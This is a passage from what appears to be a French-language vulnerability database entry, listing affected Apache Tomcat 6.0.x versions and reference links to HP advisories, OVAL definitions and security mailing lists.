- Apache>>Tomcat >> Version 6.0.6 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.6 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.7
- Apache>>Tomcat >> Version 6.0.7 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.7 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.7 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.8
- Apache>>Tomcat >> Version 6.0.8 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.8 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.9
- Apache>>Tomcat >> Version 6.0.9 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.9 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.10
- Apache>>Tomcat >> Version 6.0.10 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.11
- Apache>>Tomcat >> Version 6.0.11 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.12
- Apache>>Tomcat >> Version 6.0.12 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.13
- Apache>>Tomcat >> Version 6.0.13 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.14
- Apache>>Tomcat >> Version 6.0.14 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.15
- Apache>>Tomcat >> Version 6.0.15 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.16
- Apache>>Tomcat >> Version 6.0.16 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.17
- Apache>>Tomcat >> Version 6.0.17 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.18
- Apache>>Tomcat >> Version 6.0.18 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.20
- Apache>>Tomcat >> Version 6.0.20 (Open CPE detail)
Références
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02241113
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19414
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7033
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://www.securityfocus.com/archive/1/507720/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/516397/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02241113
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
https://lists.apache.org/thread.html/df497a37fbf98e38d4c83e44829745fe9851b5fde928409c950f80e6%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
